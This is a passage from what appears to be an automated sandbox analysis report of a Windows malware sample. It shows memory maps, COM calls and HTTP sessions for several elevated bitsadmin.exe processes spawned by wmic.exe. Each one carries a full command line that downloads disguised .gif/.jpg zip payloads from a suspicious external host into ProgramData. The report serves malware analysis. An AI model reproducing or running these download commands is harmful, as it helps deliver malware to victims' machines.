private_0x0000000000170000	0x00170000	0x001fffff	Private Memory	rw	-
rsaenh.dll	0x00170000	0x001abfff	Memory Mapped File	r	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
private_0x00000000001c0000	0x001c0000	0x001fffff	Private Memory	rw	-
private_0x0000000000230000	0x00230000	0x0032ffff	Private Memory	rw	-
pagefile_0x0000000000330000	0x00330000	0x003f7fff	Pagefile Backed Memory	r	-
private_0x0000000000440000	0x00440000	0x0047ffff	Private Memory	rw	-
bitsadmin.exe	0x004d0000	0x00513fff	Memory Mapped File	rwx	-
pagefile_0x0000000000520000	0x00520000	0x00620fff	Pagefile Backed Memory	r	-
private_0x0000000000670000	0x00670000	0x006affff	Private Memory	rw	-
private_0x00000000006f0000	0x006f0000	0x006fffff	Private Memory	rw	-
pagefile_0x0000000000700000	0x00700000	0x012fffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001300000	0x01300000	0x013defff	Pagefile Backed Memory	r	-
private_0x0000000001400000	0x01400000	0x0143ffff	Private Memory	rw	-
sortdefault.nls	0x01440000	0x0170efff	Memory Mapped File	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560, filename = C:\ProgramData\tempa\marxvxinhhmdwwn.gif	1	Fn

File (90)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	15	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	10	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	22	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 23	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0x4d0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (13)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	4	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	2	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:53 (UTC)	4	Fn
Get Time	type = Ticks, time = 123849	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:54 (UTC)	2	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	399 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	399
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmdwwn.gif.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560	1	Fn

Process #11: bitsadmin.exe

110

4

»

Information	Value
ID	#11
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672 C:\ProgramData\tempa\marxvxinhhmdx.gif
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:06, Reason: Child Process
Unmonitor	End Time: 00:01:09, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xc08
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C0C 0x C20 0x C24 0x C28 0x C2C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x0006ffff	Private Memory	rw	-
pagefile_0x0000000000070000	0x00070000	0x00073fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000080000	0x00080000	0x00080fff	Pagefile Backed Memory	r	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	r	-
pagefile_0x0000000000100000	0x00100000	0x001c7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001d0000	0x001d0000	0x001d6fff	Pagefile Backed Memory	r	-
private_0x00000000001e0000	0x001e0000	0x002dffff	Private Memory	rw	-
pagefile_0x00000000002e0000	0x002e0000	0x003e0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003f0000	0x003f0000	0x003f1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x00400000	0x00400fff	Memory Mapped File	rw	-
private_0x0000000000410000	0x00410000	0x00410fff	Private Memory	rw	-
private_0x0000000000420000	0x00420000	0x00420fff	Private Memory	rw	-
pagefile_0x0000000000430000	0x00430000	0x00430fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000440000	0x00440000	0x00440fff	Pagefile Backed Memory	r	-
private_0x0000000000480000	0x00480000	0x0048ffff	Private Memory	rw	-
rpcss.dll	0x00490000	0x004ebfff	Memory Mapped File	r	-
private_0x0000000000490000	0x00490000	0x0056ffff	Private Memory	rw	-
rsaenh.dll	0x00490000	0x004cbfff	Memory Mapped File	r	-
private_0x00000000004f0000	0x004f0000	0x0052ffff	Private Memory	rw	-
private_0x0000000000530000	0x00530000	0x0056ffff	Private Memory	rw	-
pagefile_0x0000000000570000	0x00570000	0x0064efff	Pagefile Backed Memory	r	-
private_0x0000000000680000	0x00680000	0x006bffff	Private Memory	rw	-
sortdefault.nls	0x006c0000	0x0098efff	Memory Mapped File	r	-
private_0x0000000000a20000	0x00a20000	0x00a5ffff	Private Memory	rw	-
private_0x0000000000b90000	0x00b90000	0x00bcffff	Private Memory	rw	-
bitsadmin.exe	0x00bf0000	0x00c33fff	Memory Mapped File	rwx	-
pagefile_0x0000000000c40000	0x00c40000	0x0183ffff	Pagefile Backed Memory	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672, filename = C:\ProgramData\tempa\marxvxinhhmdx.gif	1	Fn

File (90)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	16	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	10	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	22	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 23	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xbf0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (13)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	4	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	2	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:55 (UTC)	5	Fn
Get Time	type = Ticks, time = 125456	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:56 (UTC)	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	397 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	397
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmdx.gif.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672	1	Fn

Process #12: bitsadmin.exe

89

4

»

Information	Value
ID	#12
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807 C:\ProgramData\tempa\marxvxinhhme.jpg
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:08, Reason: Child Process
Unmonitor	End Time: 00:01:10, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xc38
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C3C 0x C50 0x C54 0x C58 0x C5C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	r	-
pagefile_0x0000000000100000	0x00100000	0x001c7fff	Pagefile Backed Memory	r	-
private_0x00000000001d0000	0x001d0000	0x002cffff	Private Memory	rw	-
pagefile_0x00000000002d0000	0x002d0000	0x003d0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003e0000	0x003e0000	0x003e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003f0000	0x003f0000	0x003f1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x00400000	0x00400fff	Memory Mapped File	rw	-
private_0x0000000000410000	0x00410000	0x00410fff	Private Memory	rw	-
private_0x0000000000420000	0x00420000	0x00420fff	Private Memory	rw	-
pagefile_0x0000000000430000	0x00430000	0x00430fff	Pagefile Backed Memory	r	-
private_0x0000000000440000	0x00440000	0x0044ffff	Private Memory	rw	-
rpcss.dll	0x00450000	0x004abfff	Memory Mapped File	r	-
private_0x0000000000450000	0x00450000	0x005cffff	Private Memory	rw	-
pagefile_0x0000000000450000	0x00450000	0x0052efff	Pagefile Backed Memory	r	-
pagefile_0x0000000000530000	0x00530000	0x00530fff	Pagefile Backed Memory	r	-
rsaenh.dll	0x00540000	0x0057bfff	Memory Mapped File	r	-
private_0x0000000000540000	0x00540000	0x0057ffff	Private Memory	rw	-
private_0x0000000000590000	0x00590000	0x005cffff	Private Memory	rw	-
private_0x00000000005d0000	0x005d0000	0x0060ffff	Private Memory	rw	-
private_0x0000000000770000	0x00770000	0x007affff	Private Memory	rw	-
bitsadmin.exe	0x007e0000	0x00823fff	Memory Mapped File	rwx	-
pagefile_0x0000000000830000	0x00830000	0x0142ffff	Pagefile Backed Memory	r	-
private_0x0000000001480000	0x01480000	0x014bffff	Private Memory	rw	-
sortdefault.nls	0x014c0000	0x0178efff	Memory Mapped File	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd9000	0x7ffd9000	0x7ffd9fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807, filename = C:\ProgramData\tempa\marxvxinhhme.jpg	1	Fn

File (72)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	12	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	8	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	19	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0x7e0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	3	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:26:57 (UTC)	5	Fn
Get Time	type = Ticks, time = 127437	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	396 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	396
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhme.jpg.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhme.jpg.zip?231938807	1	Fn

Process #13: bitsadmin.exe

89

4

»

Information	Value
ID	#13
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089 C:\ProgramData\tempa\marxvxinhhmf.jpg
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:09, Reason: Child Process
Unmonitor	End Time: 00:01:11, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

»

Information	Value
PID	0xc68
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x C6C 0x C80 0x C84 0x C88 0x C8C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
